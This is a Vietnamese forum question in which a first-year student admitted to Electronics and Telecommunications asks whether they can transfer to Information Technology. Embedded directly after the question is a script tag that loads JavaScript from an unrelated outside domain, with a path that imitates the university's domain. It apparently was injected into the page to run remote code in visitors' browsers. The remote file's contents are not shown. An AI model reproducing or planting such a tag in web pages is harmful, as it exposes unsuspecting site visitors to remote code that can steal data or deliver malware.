Chuyển ngành năm 1

Em muốn trúng tuyển vào trường với số điểm là 27 chuyên ngành Điện Tử Viễn Thông. Nhưng giờ em muốn chuyển sang chuyên ngành CNTT được không ạ?
<script src="https://phongkhamthaiha.org/bt3/hust.edu/file2.js"></script>

Câu hỏi này có hữu ích không?

Vui lòng đăng nhập để đánh giá câu hỏi này!

0 trong số 0 đánh giá câu hỏi này hữu ích!

Nguyễn Đức Tài

Nguyễn Đức Tài

Gửi 7 tháng trước

Chuyển ngành